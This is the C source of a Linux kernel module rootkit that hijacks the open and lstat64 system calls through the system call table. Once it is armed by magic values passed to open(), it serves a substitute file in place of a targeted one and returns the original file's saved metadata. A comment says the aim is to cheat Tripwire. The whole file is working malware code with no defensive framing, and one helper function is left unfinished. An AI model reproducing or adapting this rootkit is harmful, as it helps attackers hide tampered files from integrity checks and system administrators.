
#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <sys/syscall.h>
//#include <sys/types.h>
#include <asm/fcntl.h>
#include <asm/errno.h>
#include <linux/types.h>
//#include <linux/string.h>
#include <linux/slab.h> // kmalloc
#include <linux/mman.h>
#include <linux/compatmac.h>
#include <linux/stat.h>

#include "magic.h"

//#define __DEBUG

extern void* sys_call_table[];

int errno;

static inline _syscall1(int, brk, void*, end_data_segment);

char * fake_file;
char * hacked_file;

int lkmuriel_configured; // Not configured by default

int (*save_open_syscall)(const char *path, int flag, int mode);
int (*save_lstat64_syscall)(char *filename, struct stat64 * statbuf, long flags);

struct stat64  fake_stat64;

int filename_compare(char * users, char * kernels, unsigned int l) {
		  int i=0;
		  int same=0;
}


int my_lstat64_syscall(char *filename, struct stat64 * statbuf, long flag) {
	if( lkmuriel_configured == 1) 
		  if (!strcmp(filename, hacked_file) ) {
					 int ret;
					 unsigned long mmm= current->mm->brk;
#ifdef __DEBUG
					 printk("<1> Hackage de syscall lstat64.\n");
#endif

					 // We put the fake_file name in current process user space
					 ret= brk((void*) (mmm+256));
					 if (ret<0)
								goto fin;
					 copy_to_user( (void*) (mmm+2), fake_file, strlen(fake_file)+1);

					 // Ask the syscall to initiate statbuf (I am too lazy :) 
					 ret= save_lstat64_syscall((char *) mmm+2, statbuf, flag);
					 if (ret<0)
								goto fin2;
					 // Real statbuf value
					 copy_to_user( statbuf, &fake_stat64, sizeof(struct stat64));

fin2:
					 // Restore the current process space
					 brk((void*) mmm);

fin:
					 return ret;
		  }
	
	// default action
	return save_lstat64_syscall(filename, statbuf, flag);
}

int my_open_syscall(const char * path, int flag, int mode) {

		  // Get saved file
		  if (flag==MAGIC_FLAG) {
					 if (mode==MAGIC_MODE1) {
#ifdef __DEBUG
								printk("<1>Get saved file name and hide it\n");
#endif

								// Load fake filename
								fake_file= (char *) kmalloc(strlen(path)+1, GFP_KERNEL);
								memcpy( fake_file, path, strlen(path)+1);
#ifdef __DEBUG
								printk("<1>fake_file= %s\n", fake_file);
#endif
								return MAGIC_RETURN;
					 }

					 // Get corrupted file to spoof 
					 if (mode==MAGIC_MODE2) {
								int ret;
								unsigned long mmm= current->mm->brk;
#ifdef __DEBUG
								printk("<1>Get spoofed file and spoof it\n");
#endif

								// Load spoofed filename
								hacked_file= (char *) kmalloc(strlen(path)+1, GFP_KERNEL);
								memcpy( hacked_file, path, strlen(path)+1);
#ifdef __DEBUG
								printk("<1>hacked_file= %s\n", hacked_file);
#endif
								// Get Real statbuf value to cheat Tripwire
								ret= brk((void*) (mmm+1024));
								if (ret<0)
										  goto fini;
								copy_to_user( (void*) (mmm+2), hacked_file,
													 strlen(hacked_file)+1);
								copy_to_user( (void*) (mmm+2+strlen(hacked_file)+1),
													 (void*) &fake_stat64,
													 sizeof(struct stat64));
								ret= save_lstat64_syscall((char *) mmm+2,
													 (struct stat64 *)
													 (mmm+2+strlen(hacked_file)+1), 10);

								copy_from_user((void*)&fake_stat64,
													 (void*)(mmm+2+strlen(hacked_file)+1),
													 sizeof(struct stat64));
								brk((void*) mmm);
								// Stored in fake_stat64
#ifdef __DEBUG
								printk("<1>size file=%d", fake_stat64.st_size);
#endif
								return MAGIC_RETURN;
fini:
								return -1;
					 }

					 if (mode==MAGIC_MODE3) {
#ifdef __DEBUG
								printk("<1>Started lkm...\n");
#endif
								// syscall proxing
								lkmuriel_configured=1;
								return MAGIC_RETURN;
					 }
		  
		  			if (mode==MAGIC_MODE4) {
#ifdef __DEBUG
							  printk("<1>Am I here ? Yes ;)\n");
#endif
		  					  return MAGIC_RETURN;
					}

					if (mode==MAGIC_MODE5) {
#ifdef __DEBUG
								printk("<1>Stop lkm...\n");
#endif
								// syscall proxing
								lkmuriel_configured=0;
								return MAGIC_RETURN;
					 }


		  }
				if (lkmuriel_configured==1)
												if (!strcmp(path, hacked_file)) {
																				int ret;
																				unsigned long mmm= current->mm->brk;
#ifdef __DEBUG
																				printk("<1> Hackage de syscall open.\n");
#endif
																				ret= brk((void*) (mmm+256));

																				if (ret<0)
																												goto fin;
																				// open syscall with fake file
																				copy_to_user( (void*) (mmm+2), fake_file, strlen(fake_file)+1);
																				ret= save_open_syscall((char *) mmm+2, flag, mode);
																				brk((void*) mmm);
fin:
																				return ret;
												}
				
				// default action
				return save_open_syscall(path, flag, mode);
}

int init_module(void) {
		  unsigned long mmm= current->mm->brk;
		  int ret;
		  MODULE_LICENSE("GPL");
#ifdef __DEBUG
		  printk("<1>Je me charge....\n");
#endif
		  save_open_syscall= sys_call_table[SYS_open];
		  sys_call_table[SYS_open]=my_open_syscall;
		  save_lstat64_syscall= sys_call_table[SYS_lstat64];
		  sys_call_table[SYS_lstat64]=my_lstat64_syscall;
	  
		  lkmuriel_configured=0;
		  
		  return 0;
}

void cleanup_module(void) {

#ifdef __DEBUG
		  printk("<1>Je me decharge...\n");
#endif
		  // Crual world !
		  kfree(fake_file);
		  kfree(hacked_file);
		  sys_call_table[SYS_open]=save_open_syscall;
		  sys_call_table[SYS_lstat64]=save_lstat64_syscall;
}
